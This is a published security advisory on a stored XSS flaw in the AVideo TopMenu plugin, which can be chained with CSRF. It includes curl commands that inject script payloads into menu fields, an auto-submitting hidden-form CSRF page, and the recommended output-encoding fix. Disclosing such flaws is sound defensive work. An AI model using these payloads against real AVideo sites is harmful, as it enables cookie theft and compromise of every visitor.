GHSA-GMPC-FXG2-VCMQ

Vulnerability from github – Published: 2026-04-01 23:25 – Updated: 2026-04-01 23:25
VLAI?
Summary
AVideo has Stored XSS via Unescaped Menu Item Fields in TopMenu Plugin
Details

Summary

The TopMenu plugin renders menu item fields (icon classes, URLs, and text labels) directly into HTML without applying htmlspecialchars() or any other output encoding. Since menu items are rendered on every public page through plugin hooks, a single malicious menu entry results in stored cross-site scripting that executes for every visitor to the site. An admin user who is tricked into saving a crafted menu item (or an attacker who gains admin access) can compromise all site visitors.

Details

Multiple output locations in the TopMenu plugin render user-controlled data without escaping:

In HTMLMenuRight.php:24, the icon class is injected directly:

<i class="<?php echo $value2['icon'] ?>"></i>

In HTMLMenuRight.php:40, the URL is rendered without encoding:

<a href="<?php echo $value2['finalURL']; ?>">

In HTMLMenuLeft.php:32, same pattern for the left menu:

<a href="<?php echo $value2['finalURL']; ?>">

In index.php:49, the menu item text is echoed raw:

<?php echo $menuItem->getText(); ?>

Menu item data is saved via menuItemSave.json.php with no sanitization in the setter methods. The stored values are loaded from the database and rendered on every page because the TopMenu plugin hooks into the global page layout.

Critically, menuItemSave.json.php has no CSRF protection. It checks User::isAdmin() but does not call isGlobalTokenValid() or perform any other CSRF token validation. This means the stored XSS can be chained with CSRF: an attacker does not need a compromised admin account. Instead, a cross-origin POST from an attacker-controlled page can create the malicious menu item if an admin visits the attacker's page while logged in.

Proof of Concept

  1. As an admin user, save a menu item with a malicious icon class:
curl -b "PHPSESSID=ADMIN_SESSION" \
  -X POST "https://your-avideo-instance.com/plugin/TopMenu/menuItemSave.json.php" \
  -d 'icon=fa-home" onmouseover="alert(document.cookie)&text=Home&url=/&status=a'
  1. Alternatively, inject via the URL field to create a JavaScript link:
curl -b "PHPSESSID=ADMIN_SESSION" \
  -X POST "https://your-avideo-instance.com/plugin/TopMenu/menuItemSave.json.php" \
  -d 'icon=fa-link&text=Click+Me&url=javascript:alert(document.cookie)&status=a'
  1. Alternatively, inject via the text field:
curl -b "PHPSESSID=ADMIN_SESSION" \
  -X POST "https://your-avideo-instance.com/plugin/TopMenu/menuItemSave.json.php" \
  -d 'icon=fa-home&text=<script>alert(document.cookie)</script>&url=/&status=a'
  1. Alternatively, chain with CSRF (no admin account needed). Host this HTML on an attacker-controlled domain and lure an admin to visit it:
<!DOCTYPE html>
<html>
<head><title>AVI-041 CSRF + Stored XSS PoC</title></head>
<body>
<h1>Loading...</h1>
<iframe name="f1" style="display:none"></iframe>
<form id="inject" method="POST" target="f1"
      action="https://your-avideo-instance.com/plugin/TopMenu/menuItemSave.json.php">
  <input type="hidden" name="menuId" value="1" />
  <input type="hidden" name="item_order" value="99" />
  <input type="hidden" name="item_status" value="a" />
  <input type="hidden" name="text" value="&lt;script&gt;alert(document.cookie)&lt;/script&gt;" />
  <input type="hidden" name="title" value="Home" />
  <input type="hidden" name="url" value="/" />
  <input type="hidden" name="icon" value="fa-home" />
  <input type="hidden" name="menuSeoUrlItem" value="" />
</form>
<script>document.getElementById('inject').submit();</script>
</body>
</html>

The cross-origin POST creates the malicious menu item because menuItemSave.json.php has no CSRF token validation.

  1. Visit any page on the AVideo instance:
curl "https://your-avideo-instance.com/"
  1. The injected JavaScript executes in the context of every visitor's browser session because the menu is rendered on all pages.

Impact

Stored cross-site scripting on every page of the AVideo instance. An attacker can steal session cookies, redirect users to phishing pages, modify page content, or perform actions on behalf of authenticated users (including admins). Because the menu renders globally, a single injection point compromises all visitors to the site.

Recommended Fix

Apply htmlspecialchars() with ENT_QUOTES to all outputs of $value2['finalURL'], $value2['icon'], and $menuItem->getText() in the TopMenu plugin templates:

// HTMLMenuRight.php:24
<i class="<?php echo htmlspecialchars($value2['icon'], ENT_QUOTES, 'UTF-8'); ?>"></i>

// HTMLMenuRight.php:40
<a href="<?php echo htmlspecialchars($value2['finalURL'], ENT_QUOTES, 'UTF-8'); ?>">

// HTMLMenuLeft.php:32
<a href="<?php echo htmlspecialchars($value2['finalURL'], ENT_QUOTES, 'UTF-8'); ?>">

// floatMenu.php - same pattern for any $value2['icon'] and $value2['finalURL'] outputs
// index.php:49
<?php echo htmlspecialchars($menuItem->getText(), ENT_QUOTES, 'UTF-8'); ?>

Apply the same encoding to every location in HTMLMenuRight.php, HTMLMenuLeft.php, floatMenu.php, and index.php where these values are echoed into HTML.

Found by aisafe.io

Severity ?
6.1 (Medium)
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
Show details on source website
To clipboard 

{
  "affected": [
    {
      "package": {
        "ecosystem": "Packagist",
        "name": "wwbn/avideo"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "last_affected": "26.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [],
  "database_specific": {
    "cwe_ids": [
      "CWE-79"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-04-01T23:25:11Z",
    "nvd_published_at": null,
    "severity": "MODERATE"
  },
  "details": "## Summary\n\nThe TopMenu plugin renders menu item fields (icon classes, URLs, and text labels) directly into HTML without applying `htmlspecialchars()` or any other output encoding. Since menu items are rendered on every public page through plugin hooks, a single malicious menu entry results in stored cross-site scripting that executes for every visitor to the site. An admin user who is tricked into saving a crafted menu item (or an attacker who gains admin access) can compromise all site visitors.\n\n## Details\n\nMultiple output locations in the TopMenu plugin render user-controlled data without escaping:\n\nIn `HTMLMenuRight.php:24`, the icon class is injected directly:\n\n```php\n\u003ci class=\"\u003c?php echo $value2[\u0027icon\u0027] ?\u003e\"\u003e\u003c/i\u003e\n```\n\nIn `HTMLMenuRight.php:40`, the URL is rendered without encoding:\n\n```php\n\u003ca href=\"\u003c?php echo $value2[\u0027finalURL\u0027]; ?\u003e\"\u003e\n```\n\nIn `HTMLMenuLeft.php:32`, same pattern for the left menu:\n\n```php\n\u003ca href=\"\u003c?php echo $value2[\u0027finalURL\u0027]; ?\u003e\"\u003e\n```\n\nIn `index.php:49`, the menu item text is echoed raw:\n\n```php\n\u003c?php echo $menuItem-\u003egetText(); ?\u003e\n```\n\nMenu item data is saved via `menuItemSave.json.php` with no sanitization in the setter methods. The stored values are loaded from the database and rendered on every page because the TopMenu plugin hooks into the global page layout.\n\nCritically, `menuItemSave.json.php` has no CSRF protection. It checks `User::isAdmin()` but does not call `isGlobalTokenValid()` or perform any other CSRF token validation. This means the stored XSS can be chained with CSRF: an attacker does not need a compromised admin account. Instead, a cross-origin POST from an attacker-controlled page can create the malicious menu item if an admin visits the attacker\u0027s page while logged in.\n\n## Proof of Concept\n\n1. As an admin user, save a menu item with a malicious icon class:\n\n```bash\ncurl -b \"PHPSESSID=ADMIN_SESSION\" \\\n  -X POST \"https://your-avideo-instance.com/plugin/TopMenu/menuItemSave.json.php\" \\\n  -d \u0027icon=fa-home\" onmouseover=\"alert(document.cookie)\u0026text=Home\u0026url=/\u0026status=a\u0027\n```\n\n2. Alternatively, inject via the URL field to create a JavaScript link:\n\n```bash\ncurl -b \"PHPSESSID=ADMIN_SESSION\" \\\n  -X POST \"https://your-avideo-instance.com/plugin/TopMenu/menuItemSave.json.php\" \\\n  -d \u0027icon=fa-link\u0026text=Click+Me\u0026url=javascript:alert(document.cookie)\u0026status=a\u0027\n```\n\n3. Alternatively, inject via the text field:\n\n```bash\ncurl -b \"PHPSESSID=ADMIN_SESSION\" \\\n  -X POST \"https://your-avideo-instance.com/plugin/TopMenu/menuItemSave.json.php\" \\\n  -d \u0027icon=fa-home\u0026text=\u003cscript\u003ealert(document.cookie)\u003c/script\u003e\u0026url=/\u0026status=a\u0027\n```\n\n4. Alternatively, chain with CSRF (no admin account needed). Host this HTML on an attacker-controlled domain and lure an admin to visit it:\n\n```html\n\u003c!DOCTYPE html\u003e\n\u003chtml\u003e\n\u003chead\u003e\u003ctitle\u003eAVI-041 CSRF + Stored XSS PoC\u003c/title\u003e\u003c/head\u003e\n\u003cbody\u003e\n\u003ch1\u003eLoading...\u003c/h1\u003e\n\u003ciframe name=\"f1\" style=\"display:none\"\u003e\u003c/iframe\u003e\n\u003cform id=\"inject\" method=\"POST\" target=\"f1\"\n      action=\"https://your-avideo-instance.com/plugin/TopMenu/menuItemSave.json.php\"\u003e\n  \u003cinput type=\"hidden\" name=\"menuId\" value=\"1\" /\u003e\n  \u003cinput type=\"hidden\" name=\"item_order\" value=\"99\" /\u003e\n  \u003cinput type=\"hidden\" name=\"item_status\" value=\"a\" /\u003e\n  \u003cinput type=\"hidden\" name=\"text\" value=\"\u0026lt;script\u0026gt;alert(document.cookie)\u0026lt;/script\u0026gt;\" /\u003e\n  \u003cinput type=\"hidden\" name=\"title\" value=\"Home\" /\u003e\n  \u003cinput type=\"hidden\" name=\"url\" value=\"/\" /\u003e\n  \u003cinput type=\"hidden\" name=\"icon\" value=\"fa-home\" /\u003e\n  \u003cinput type=\"hidden\" name=\"menuSeoUrlItem\" value=\"\" /\u003e\n\u003c/form\u003e\n\u003cscript\u003edocument.getElementById(\u0027inject\u0027).submit();\u003c/script\u003e\n\u003c/body\u003e\n\u003c/html\u003e\n```\n\nThe cross-origin POST creates the malicious menu item because `menuItemSave.json.php` has no CSRF token validation.\n\n5. Visit any page on the AVideo instance:\n\n```bash\ncurl \"https://your-avideo-instance.com/\"\n```\n\n6. The injected JavaScript executes in the context of every visitor\u0027s browser session because the menu is rendered on all pages.\n\n## Impact\n\nStored cross-site scripting on every page of the AVideo instance. An attacker can steal session cookies, redirect users to phishing pages, modify page content, or perform actions on behalf of authenticated users (including admins). Because the menu renders globally, a single injection point compromises all visitors to the site.\n\n## Recommended Fix\n\nApply `htmlspecialchars()` with `ENT_QUOTES` to all outputs of `$value2[\u0027finalURL\u0027]`, `$value2[\u0027icon\u0027]`, and `$menuItem-\u003egetText()` in the TopMenu plugin templates:\n\n```php\n// HTMLMenuRight.php:24\n\u003ci class=\"\u003c?php echo htmlspecialchars($value2[\u0027icon\u0027], ENT_QUOTES, \u0027UTF-8\u0027); ?\u003e\"\u003e\u003c/i\u003e\n\n// HTMLMenuRight.php:40\n\u003ca href=\"\u003c?php echo htmlspecialchars($value2[\u0027finalURL\u0027], ENT_QUOTES, \u0027UTF-8\u0027); ?\u003e\"\u003e\n\n// HTMLMenuLeft.php:32\n\u003ca href=\"\u003c?php echo htmlspecialchars($value2[\u0027finalURL\u0027], ENT_QUOTES, \u0027UTF-8\u0027); ?\u003e\"\u003e\n\n// floatMenu.php - same pattern for any $value2[\u0027icon\u0027] and $value2[\u0027finalURL\u0027] outputs\n// index.php:49\n\u003c?php echo htmlspecialchars($menuItem-\u003egetText(), ENT_QUOTES, \u0027UTF-8\u0027); ?\u003e\n```\n\nApply the same encoding to every location in `HTMLMenuRight.php`, `HTMLMenuLeft.php`, `floatMenu.php`, and `index.php` where these values are echoed into HTML.\n\n---\n*Found by [aisafe.io](https://aisafe.io)*",
  "id": "GHSA-gmpc-fxg2-vcmq",
  "modified": "2026-04-01T23:25:11Z",
  "published": "2026-04-01T23:25:11Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/WWBN/AVideo/security/advisories/GHSA-gmpc-fxg2-vcmq"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/WWBN/AVideo"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "AVideo has Stored XSS via Unescaped Menu Item Fields in TopMenu Plugin"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.




Sightings

Author Source Type Date

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.



Detection rules are retrieved from Rulezet.